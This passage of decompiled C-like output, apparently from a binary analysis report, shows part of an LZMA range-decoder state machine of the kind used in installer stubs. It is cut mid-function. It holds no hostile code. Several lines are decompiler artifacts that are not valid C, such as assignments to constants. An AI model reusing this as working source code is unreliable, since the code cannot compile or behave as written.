												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
